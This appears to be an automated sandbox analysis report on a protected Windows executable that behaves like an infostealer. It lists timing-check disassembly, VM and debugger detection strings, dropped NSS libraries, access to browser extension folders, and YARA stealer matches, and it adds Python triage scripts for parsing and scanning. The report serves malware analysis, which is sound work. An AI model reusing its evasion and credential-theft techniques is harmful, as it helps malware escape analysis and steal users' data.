Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D704FF second address: 4D70537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F06D8B4D9CEh 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70537 second address: 4D7053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7053D second address: 4D70565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70565 second address: 4D70574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70574 second address: 4D7058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7058C second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edx] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F06D8518558h 0x00000012 pop eax 0x00000013 mov cl, bl 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D705B5 second address: 4D7060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub ecx, 656E8948h 0x00000017 jmp 00007F06D8B4D9CBh 0x0000001c popfd 0x0000001d mov dl, cl 0x0000001f popad 0x00000020 test al, al 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007F06D8B4D9CAh 0x0000002d and esi, 66884BA8h 0x00000033 jmp 00007F06D8B4D9CBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7060F second address: 4D70627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70627 second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F06D8B4D91Ch 0x00000011 mov al, byte ptr [edx] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F06D8B4D9D8h 0x0000001b pop eax 0x0000001c mov cl, bl 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70670 second address: 4D70683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70683 second address: 4D706FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub cx, 3858h 0x00000016 jmp 00007F06D8B4D9CBh 0x0000001b popfd 0x0000001c call 00007F06D8B4D9D8h 0x00000021 mov esi, 09FE2891h 0x00000026 pop ecx 0x00000027 popad 0x00000028 lea ebx, dword ptr [edi+01h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F06D8B4D9D8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D706FC second address: 4D70712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70712 second address: 4D7072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 mov bl, cl 0x00000008 pop ebx 0x00000009 popad 0x0000000a inc edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7072D second address: 4D7073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7073C second address: 4D707D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 add cl, FFFFFFEEh 0x0000000c jmp 00007F06D8B4D9D9h 0x00000011 popfd 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test al, al 0x00000019 jmp 00007F06D8B4D9CAh 0x0000001e jne 00007F0748BC5CC8h 0x00000024 jmp 00007F06D8B4D9D0h 0x00000029 mov ecx, edx 0x0000002b jmp 00007F06D8B4D9D0h 0x00000030 shr ecx, 02h 0x00000033 jmp 00007F06D8B4D9D0h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F06D8B4D9D7h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D707D3 second address: 4D707D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D707D9 second address: 4D707DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D707DD second address: 4D707F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ecx, 11246AA5h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D707F2 second address: 4D70804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70804 second address: 4D70836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 03h 0x0000000e jmp 00007F06D8518556h 0x00000013 rep movsb 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70836 second address: 4D7083C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7083C second address: 4D70861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70861 second address: 4D70865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70865 second address: 4D70869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70869 second address: 4D7086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7086F second address: 4D70875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70875 second address: 4D70879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70879 second address: 4D708C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, ebx 0x0000000a pushad 0x0000000b mov ch, 20h 0x0000000d pushfd 0x0000000e jmp 00007F06D8518555h 0x00000013 adc esi, 5290EDC6h 0x00000019 jmp 00007F06D8518551h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ecx, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F06D851854Dh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D708C7 second address: 4D708F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D7h 0x00000008 mov bh, cl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr fs:[00000000h], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D708F3 second address: 4D708F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D708F9 second address: 4D70944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 or esi, 663F09E6h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F06D8B4D9CCh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70944 second address: 4D7094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7094A second address: 4D7094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D7094E second address: 4D7047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov ax, dx 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad 0x00000012 mov edi, 28760A7Eh 0x00000017 mov al, dh 0x00000019 popad 0x0000001a leave 0x0000001b jmp 00007F06D851854Eh 0x00000020 retn 0008h 0x00000023 cmp dword ptr [ebp-2Ch], 10h 0x00000027 mov eax, dword ptr [ebp-40h] 0x0000002a jnc 00007F06D8518545h 0x0000002c push eax 0x0000002d lea edx, dword ptr [ebp-00000590h] 0x00000033 push edx 0x00000034 call esi 0x00000036 push 00000008h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F06D8518557h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 4D70A30 second address: 4D70A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 64CAh 0x00000007 mov ebx, 0DE50396h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F06D8B4D9D3h 0x00000017 rdtsc
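The interceptor records above are mostly state-neutral filler between the two `rdtsc` executions: `pushad`/`popad`, `push r`/`pop r` on the same register, and `jmp` trampolines to the next fragment. That is the style of an Oreans protector, which the `Oreans.vxd` and `Software\WinLicense` strings further down this section also point to. The following is an added example, not code from the report or from Joe Sandbox: it parses records in the report's own line format, collapses the filler, and reports what is left between the timestamps plus whether the pair jumps backwards (a loop). The two sample records are copied from the listing; the parsing rules are the example's own.

```python
import re
from dataclasses import dataclass, field

# Constructed input: two interceptor records in the shape the report prints them
# (addresses and instruction text copied from the listing above).
SAMPLE_RECORDS = [
    "First address: 117052D second address: 117053A instructions: 0x00000000 rdtsc "
    "0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax "
    "0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx "
    "0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc",
    "First address: 4D70627 second address: 4D705B5 instructions: 0x00000000 rdtsc "
    "0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax "
    "0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F06D8B4D91Ch "
    "0x00000011 mov al, byte ptr [edx] 0x00000013 push eax 0x00000014 push edx "
    "0x00000015 pushad 0x00000016 call 00007F06D8B4D9D8h 0x0000001b pop eax "
    "0x0000001c mov cl, bl 0x0000001e popad 0x0000001f rdtsc",
]

_HEADER = re.compile(
    r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)"
    r"\s+instructions:\s*(.*)$"
)
_OFFSET = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")   # "0x0000000a " precedes each instruction


@dataclass
class RdtscRecord:
    first: int                    # address of the first rdtsc
    second: int                   # address of the second rdtsc
    instructions: list = field(default_factory=list)


def parse_record(line: str) -> RdtscRecord:
    m = _HEADER.match(line.strip())
    if not m:
        raise ValueError("not an RDTSC interceptor record")
    instrs = [s.strip() for s in _OFFSET.split(m.group(3)) if s.strip()]
    return RdtscRecord(int(m.group(1), 16), int(m.group(2), 16), instrs)


_NEUTRAL = {("pushad", "popad"), ("pushfd", "popfd")}


def _cancels(a: str, b: str) -> bool:
    """True for an adjacent pair that leaves registers, flags and stack unchanged."""
    if (a, b) in _NEUTRAL:
        return True
    ta, tb = a.split(None, 1), b.split(None, 1)
    return (len(ta) == 2 and len(tb) == 2
            and ta[0] == "push" and tb[0] == "pop" and ta[1] == tb[1])


def strip_junk(instrs):
    # An unconditional jmp to a fixed target only links to the next fragment.
    out = [i for i in instrs if not i.startswith("jmp ")]
    changed = True
    while changed:                # repeat so pairs exposed by a removal collapse too
        changed, kept, i = False, [], 0
        while i < len(out):
            if i + 1 < len(out) and _cancels(out[i], out[i + 1]):
                i, changed = i + 2, True
            else:
                kept.append(out[i])
                i += 1
        out = kept
    return out


def is_back_edge(rec: RdtscRecord) -> bool:
    return rec.second < rec.first


def summarize(lines):
    rows = []
    for line in lines:
        rec = parse_record(line)
        real = strip_junk(rec.instructions)
        payload = real[1:-1] if real[:1] == ["rdtsc"] and real[-1:] == ["rdtsc"] else real
        rows.append({"first": f"{rec.first:X}", "second": f"{rec.second:X}",
                     "raw": len(rec.instructions), "real": len(real),
                     "back_edge": is_back_edge(rec), "payload": payload})
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE_RECORDS):
        print(row)
```

`strip_junk` only collapses adjacent pairs. The `push eax`/`push edx` before one `rdtsc` and the `pop edx`/`pop eax` after the next belong to different records, so whether the timestamp in EDX:EAX is consumed or simply discarded has to be read across records, not within one. A back-edge record (second address below the first, as in 4D70627 to 4D705B5) marks a loop in the protected code and is the place to look for a real threshold comparison rather than filler.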
Source: C:\Users\user\Desktop\random(1).exe | Special instruction interceptor: First address: ECF924 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(1).exe | Special instruction interceptor: First address: 110955D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(1).exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\random(1).exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\random(1).exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
Source: C:\Users\user\Desktop\random(1).exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\random(1).exe TID: 7636 | Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo,0_2_6C59EBF0
Source: C:\Users\user\Desktop\random(1).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\random(1).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\random(1).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\random(1).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\random(1).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\random(1).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: random(1).exe, 00000000.00000002.2013235084.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\random(1).exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\random(1).exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\random(1).exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random(1).exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe | File opened: NTICE
Source: C:\Users\user\Desktop\random(1).exe | File opened: SICE
Source: C:\Users\user\Desktop\random(1).exe | File opened: SIWVID
Source: C:\Users\user\Desktop\random(1).exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\random(1).exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\random(1).exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C66AC62
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C66AC62
Source: C:\Users\user\Desktop\random(1).exe | Memory protected: page guard
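The window class names, SoftICE device names and hypervisor strings listed in this and the previous section are static, so they can be found in a memory dump or unpacked image before the sample is ever run again. The following is an added triage example, not code from the report or from Joe Sandbox: it scans a byte blob for exactly those indicators in both ASCII and UTF-16LE form and groups the hits by the evasion they serve. The SoftICE names are searched as the `\\.\` device paths such a check normally opens; that form is an assumption, since the report prints only the bare names NTICE, SICE and SIWVID. The sample dump is constructed from strings quoted above.

```python
import re

# Strings the report attributes to this sample, grouped by what the code uses them for.
# ASSUMPTION: the SoftICE names are written as the \\.\ device paths the check usually
# opens; the report itself shows only the bare names.
INDICATORS = {
    "vm_artifact": ["HARDWARE\\ACPI\\DSDT\\VBOX__", "VMwareVMware", "Hyper-V RAW"],
    "protector": ["Oreans.vxd", "Software\\WinLicense"],
    "analysis_window": ["regmonclass", "filemonclass", "procmon_window_class",
                        "ollydbg", "gbdyllo", "process monitor - sysinternals"],
    "softice_device": ["\\\\.\\NTICE", "\\\\.\\SICE", "\\\\.\\SIWVID"],
}


def _compile():
    """One case-insensitive ASCII pattern and one exact UTF-16LE pattern per indicator."""
    pats = []
    for category, names in INDICATORS.items():
        for name in names:
            pats.append((category, name, "ascii",
                         re.compile(re.escape(name.encode("ascii")), re.IGNORECASE)))
            pats.append((category, name, "utf16",
                         re.compile(re.escape(name.encode("utf-16-le")))))
    return pats


_PATTERNS = _compile()


def scan_blob(blob: bytes):
    """Return every indicator hit in the blob, ordered by offset."""
    hits = []
    for category, name, enc, pat in _PATTERNS:
        for m in pat.finditer(blob):
            hits.append({"offset": m.start(), "category": category,
                         "indicator": name, "encoding": enc})
    hits.sort(key=lambda h: (h["offset"], h["indicator"]))
    return hits


def categories_hit(hits):
    """The evasion families present, which is what a triage note usually needs."""
    return sorted({h["category"] for h in hits})


# Constructed stand-in for a process memory dump: ASCII strings taken from the
# report's memory-string findings, one UTF-16LE window class name, and filler.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Restart now?\\\\.\\Oreans.vxd%s\\Oreans.vxdXprotEvent"
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__SeShutdownPrivilege\x00"
    + "procmon_window_class".encode("utf-16-le") + b"\x00\x00"
    + b"\\\\.\\SICE\x00OLLYDBG\x00"
)

if __name__ == "__main__":
    for h in scan_blob(SAMPLE_DUMP):
        print(f"{h['offset']:#06x} {h['category']:16} {h['encoding']:5} {h['indicator']}")
```

Run it over the `.sdmp` regions the report names rather than the on-disk file: the strings sit inside the protector's unpacked code (the `00000040.00000001.01000000` region flagged as executable) and are not visible in the packed binary. A hit in `analysis_window` or `softice_device` is a strong sign the sample will behave differently under a debugger, so the next dynamic run should use a renamed debugger window class or a stealth plugin.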

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,0_2_6C6B4760
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,0_2_6C591C30
Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: QProgram Manager
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C66AE71 cpuid 0_2_6C66AE71
Source: C:\Users\user\Desktop\random(1).exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\random(1).exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\random(1).exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\random(1).exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6C66A8DC
Source: C:\Users\user\Desktop\random(1).exe | Code function: 0_2_6C5B8390 NSS_GetVersion,0_2_6C5B8390

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
